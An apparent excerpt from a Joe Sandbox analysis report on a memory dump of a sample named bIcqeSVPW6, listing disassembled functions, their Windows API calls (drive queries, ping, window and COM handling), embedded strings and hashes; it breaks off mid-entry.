_wcscpy.LIBCMT ref: 00A569C7
_wcscat.LIBCMT ref: 00A569D6
_wcscat.LIBCMT ref: 00A56A2B
_wcscat.LIBCMT ref: 00A56A61
_wcscat.LIBCMT ref: 00A56A73

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: faa243fc6443608920164ac7d4e10f67de007772f76314c1012bcbdebe132876
Instruction ID: 33d48809abcb0520e91b3ce8e250b76e4caa17001ae4c819e16f31b7401ade24
Opcode Fuzzy Hash: faa243fc6443608920164ac7d4e10f67de007772f76314c1012bcbdebe132876
Instruction Fuzzy Hash: A7412B7688511CAECF61EB90DC56DCA73BCFB44340F4041A7BA59A3051EA30ABE88F54

Function 00A5D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00AADC00,00AADC00,00AADC00), ref: 00A5D7CE
GetDriveTypeW.KERNEL32(?,00AC3A70,00000061), ref: 00A5D898
_wcscpy.LIBCMT ref: 00A5D8C2

Strings

network, xrefs: 00A5D82C
removable, xrefs: 00A5D800
fixed, xrefs: 00A5D816
unknown, xrefs: 00A5D859
cdrom, xrefs: 00A5D7EA
all, xrefs: 00A5D7D4
ramdisk, xrefs: 00A5D842

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: dca5ec665765fb47da6907161d9e38e6e4910a7ce1a762219464141828d5dfad
Instruction ID: ae6d1e48d6eba6954d0c80f3f5da2098044693a63b0a6e445b757e38e3e503e8
Opcode Fuzzy Hash: dca5ec665765fb47da6907161d9e38e6e4910a7ce1a762219464141828d5dfad
Instruction Fuzzy Hash: 85518335108300AFC710EF14D991BAEB7A5FF94355F10892DF99A572A2DB31DE49CB82

Function 00A1936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00A193AB
__itow.LIBCMT ref: 00A193DF

Part of subcall function 00A31557: _xtow@16.LIBCMT ref: 00A31578

Strings

True, xrefs: 00A84C8C
False, xrefs: 00A84C93
0x%p, xrefs: 00A84CAD
%.15g, xrefs: 00A193A5

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: e9af9fc4641e4273a5c0bc70c59b4687e3f9fb877cf31a0699e39c9d6e869c63
Instruction ID: 2c3e3e59fef7e8e0f90f1025156d9fab6ded38819ebf52599cf1a8c6cbd14760
Opcode Fuzzy Hash: e9af9fc4641e4273a5c0bc70c59b4687e3f9fb877cf31a0699e39c9d6e869c63
Instruction Fuzzy Hash: 6B41D572504215AFDB24EF78EA52EAAB7F8EF48300F20446EF55AD71C1EA31D981CB10

Function 00A7A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00A7A259
CreateCompatibleDC.GDI32(00000000), ref: 00A7A260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A7A273
SelectObject.GDI32(00000000,00000000), ref: 00A7A27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 00A7A286
DeleteDC.GDI32(00000000), ref: 00A7A28F
GetWindowLongW.USER32(?,000000EC), ref: 00A7A299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00A7A2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00A7A2B9

Strings

static, xrefs: 00A7A1F1

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: ed0fa9f39fce5d37f9218a90d7da946f591def084e7238f46c44aff6a0e386a9
Instruction ID: 46eb459d473483866725f60cbee33ce2d351a4e80f83e489d2bc259c0bec8b00
Opcode Fuzzy Hash: ed0fa9f39fce5d37f9218a90d7da946f591def084e7238f46c44aff6a0e386a9
Instruction Fuzzy Hash: 8E318D32200214BBDF119FA4DC49FEE3B69FF59360F118315FA19A60A1CB31D862DBA5

Function 00A56F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00A56F1D
gethostname.WSOCK32(?,00000100), ref: 00A56F37
gethostbyname.WSOCK32(?), ref: 00A56F44
_wcscpy.LIBCMT ref: 00A56F6C
inet_ntoa.WSOCK32(?), ref: 00A56F8A
_strcat.LIBCMT ref: 00A56F98
_wcscpy.LIBCMT ref: 00A56FAF
WSACleanup.WSOCK32 ref: 00A56FBD
_wcscpy.LIBCMT ref: 00A56FCB

Strings

0.0.0.0, xrefs: 00A56F66

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: a34e4153d6ad09f109cf82b07e9b052c38b48decebdd50ec096711e3fbe90b0f
Instruction ID: fdc2b6f3156d97301e1a61224e2872a4593a2347463a55c7ccb6c2362879db4b
Opcode Fuzzy Hash: a34e4153d6ad09f109cf82b07e9b052c38b48decebdd50ec096711e3fbe90b0f
Instruction Fuzzy Hash: 9D11E472A04114BFDB24ABB4ED4AEDA77BCFF40711F400066F445A7091EF709A898B50

Function 00A3500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A35047

Part of subcall function 00A37C0E: __getptd_noexit.LIBCMT ref: 00A37C0E

__gmtime64_s.LIBCMT ref: 00A350E0
__gmtime64_s.LIBCMT ref: 00A35116
__gmtime64_s.LIBCMT ref: 00A35133
__allrem.LIBCMT ref: 00A35189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A351A5
__allrem.LIBCMT ref: 00A351BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A351DA
__allrem.LIBCMT ref: 00A351F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A3520F
__invoke_watson.LIBCMT ref: 00A35280

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: 3f4dc89a8fb737062dbfca90a46b03a6cae03cb41201ed66d624197f58c07a62
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: BA71C7B6E00B16ABD714AF7CCD81BAAB3A8AF41764F144239F914DB681E770DD408BD0

Function 00A54DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A54DF8
GetMenuItemInfoW.USER32(00AD1708,000000FF,00000000,00000030), ref: 00A54E59
SetMenuItemInfoW.USER32(00AD1708,00000004,00000000,00000030), ref: 00A54E8F
Sleep.KERNEL32(000001F4), ref: 00A54EA1
GetMenuItemCount.USER32(?), ref: 00A54EE5
GetMenuItemID.USER32(?,00000000), ref: 00A54F01
GetMenuItemID.USER32(?,-00000001), ref: 00A54F2B
GetMenuItemID.USER32(?,?), ref: 00A54F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A54FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A54FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A54FEB

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 9b39f0e9ceea8cfd9915973b9d56b7b71017d835121441f1d34d72c240f57bb5
Instruction ID: cf65b984de7cacaf440f58f19225dd4b57ef460c0d6ea0aa64d851e188283164
Opcode Fuzzy Hash: 9b39f0e9ceea8cfd9915973b9d56b7b71017d835121441f1d34d72c240f57bb5
Instruction Fuzzy Hash: 0A619271A00249AFDB11CFA8D9849EE7BB9FB4970AF140159FC42A7251D771AD8DCB20

Function 00A79C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A79C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A79C9B
GetWindowLongW.USER32(?,000000F0), ref: 00A79CBF
_memset.LIBCMT ref: 00A79CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A79CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A79D5A

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: aedf67df7830a36883fa94958be9f4c530e88e96bd363ab626df38e7825ec79f
Instruction ID: 8365cdddb33096bab279994d8f8a3e08cfeec95eb9c0778eb1211dafb6d03c63
Opcode Fuzzy Hash: aedf67df7830a36883fa94958be9f4c530e88e96bd363ab626df38e7825ec79f
Instruction Fuzzy Hash: 6361B175A00208AFDB21DFA8CC81EEE77B8EF09704F14815AFA19E7291D774AD42DB50

Function 00A494E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00A494FE
SafeArrayAllocData.OLEAUT32(?), ref: 00A49549
VariantInit.OLEAUT32(?), ref: 00A4955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 00A4957B
VariantCopy.OLEAUT32(?,?), ref: 00A495BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 00A495D2
VariantClear.OLEAUT32(?), ref: 00A495E7
SafeArrayDestroyData.OLEAUT32(?), ref: 00A495F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A495FD
VariantClear.OLEAUT32(?), ref: 00A4960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A4961A

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 6d2f61c6e74cbf010df55471ad5892a4ea04a27f6e270e3e5108c2a57de90455
Instruction ID: e185e78b59c8f1b257f67bd32ccc366127785337561ade0f33f61b2a09af2a0c
Opcode Fuzzy Hash: 6d2f61c6e74cbf010df55471ad5892a4ea04a27f6e270e3e5108c2a57de90455
Instruction Fuzzy Hash: 2C414335A00219AFCB01EFE8D9849DFBF79FF88354F108065E502A7151DB71EA96CBA1

Function 00A6ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A1936C: __swprintf.LIBCMT ref: 00A193AB
Part of subcall function 00A1936C: __itow.LIBCMT ref: 00A193DF

CoInitialize.OLE32 ref: 00A6ADF6
CoUninitialize.OLE32 ref: 00A6AE01
CoCreateInstance.OLE32(?,00000000,00000017,00A9D8FC,?), ref: 00A6AE61
IIDFromString.OLE32(?,?), ref: 00A6AED4
VariantInit.OLEAUT32(?), ref: 00A6AF6E
VariantClear.OLEAUT32(?), ref: 00A6AFCF

Strings

Failed to create object, xrefs: 00A6AE6C, 00A6AF22
Invalid parameter, xrefs: 00A6AEED
NULL Pointer assignment, xrefs: 00A6AEA6

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: fa12a3976f0f48ad0d011017f7f298bd9c6acf0019c0ee66b90f32ab20ef958b
Instruction ID: 83054570abec582b60c2c03118e3aaa7e3127dbe1ce4f240221aea181c054d9e
Opcode Fuzzy Hash: fa12a3976f0f48ad0d011017f7f298bd9c6acf0019c0ee66b90f32ab20ef958b
Instruction Fuzzy Hash: 9B617C71608311AFD711DF54C948B6AB7F8AF98714F10481EF985AB292C771ED44CB93

Function 00A68107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00A68168
inet_addr.WSOCK32(?,?,?), ref: 00A681AD
gethostbyname.WSOCK32(?), ref: 00A681B9
IcmpCreateFile.IPHLPAPI ref: 00A681C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A68237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A6824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00A682C2
WSACleanup.WSOCK32 ref: 00A682C8

Strings

Ping, xrefs: 00A681EB

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: d2119d75f3148698d40dcb8415cb7a8b0312a08a23cb354157d3e3331ee6148f
Instruction ID: bdf59de7cbf3680e6304a7839f47a96afe1982544be5a79ea1ed82ac37d43dbc
Opcode Fuzzy Hash: d2119d75f3148698d40dcb8415cb7a8b0312a08a23cb354157d3e3331ee6148f
Instruction Fuzzy Hash: 3E51AF316047009FDB20DF64CD55BAAB7F8AF48720F048A2AFA65DB2A0DF74E945CB41

Function 00A5E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A5E396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00A5E40C
GetLastError.KERNEL32 ref: 00A5E416
SetErrorMode.KERNEL32(00000000,READY), ref: 00A5E483

Strings

INVALID, xrefs: 00A5E455
READY, xrefs: 00A5E45C
NOTREADY, xrefs: 00A5E442
READONLY, xrefs: 00A5E44E
UNKNOWN, xrefs: 00A5E43B

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: e18d6be348de372b16c932490d9c22c23e41b950e8e883ea449bc3219067a1b3
Instruction ID: 7e07f40157bf961af1d81b1aa5ec7e65f84361f6d28eb4a34ccaf51ec387c122
Opcode Fuzzy Hash: e18d6be348de372b16c932490d9c22c23e41b950e8e883ea449bc3219067a1b3
Instruction Fuzzy Hash: 3C318336A00205AFDB05EFA4D945FBE77B4FF44301F14841AF906EB291DB719A4AC751

Function 00A4B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00A4B98C
GetDlgCtrlID.USER32 ref: 00A4B997
GetParent.USER32 ref: 00A4B9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00A4B9B6
GetDlgCtrlID.USER32(?), ref: 00A4B9BF
GetParent.USER32(?), ref: 00A4B9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 00A4B9DE

Strings

ComboBox, xrefs: 00A4B911
ListBox, xrefs: 00A4B949

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 32aba1d6481ade836ea89553891558b217f150e8a70b4e81a3deab9842400dd7
Instruction ID: 077039ce4b0f6f915f52924410ef27db6191a9ea545c961f28e1d3f80862d7b1
Opcode Fuzzy Hash: 32aba1d6481ade836ea89553891558b217f150e8a70b4e81a3deab9842400dd7
Instruction Fuzzy Hash: F821A474A40104BFDF04EBA4CC85EFEB775EB85310B10011AF651932D2DB759856DB20

Function 00A4B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00A4BA73
GetDlgCtrlID.USER32 ref: 00A4BA7E
GetParent.USER32 ref: 00A4BA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 00A4BA9D
GetDlgCtrlID.USER32(?), ref: 00A4BAA6
GetParent.USER32(?), ref: 00A4BAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 00A4BAC5

Strings

ComboBox, xrefs: 00A4B9FA
ListBox, xrefs: 00A4BA32

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: f8c481a72b175bb457322ed82a40f3aa0524d1376bf3ee6137cd27d9c8957b48
Instruction ID: 70fcb17735132559a5df7f2c5a637fcdfda3d9340102f8cf7a2f3c5e6a50e290
Opcode Fuzzy Hash: f8c481a72b175bb457322ed82a40f3aa0524d1376bf3ee6137cd27d9c8957b48
Instruction Fuzzy Hash: B32192B8A40208BFDF05EBA4CC85FFEBB79EF85340F10401AF551A7191DB79995A9B20

Function 00A4BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00A4BAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 00A4BAF8
_wcscmp.LIBCMT ref: 00A4BB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A4BB85

Strings

list, xrefs: 00A4BB67
details, xrefs: 00A4BB33
smallicons, xrefs: 00A4BB4D
SHELLDLL_DefView, xrefs: 00A4BB04
largeicons, xrefs: 00A4BB19

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: da0a7d4b14acac228f934b678fba301701140d48d6a55ac45a7f7fa0d58722f8
Instruction ID: 54fc10ee256052082a4f90fa0cb89b57dc3f620cd19df7d88983bb824b6ede3a
Opcode Fuzzy Hash: da0a7d4b14acac228f934b678fba301701140d48d6a55ac45a7f7fa0d58722f8
Instruction Fuzzy Hash: 6A11297A658303FDFA206734DC17EA737ACDB91364F200026FA04E50D5EFA1E8524634

Function 00A6B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A6B2D5
CoInitialize.OLE32(00000000), ref: 00A6B302
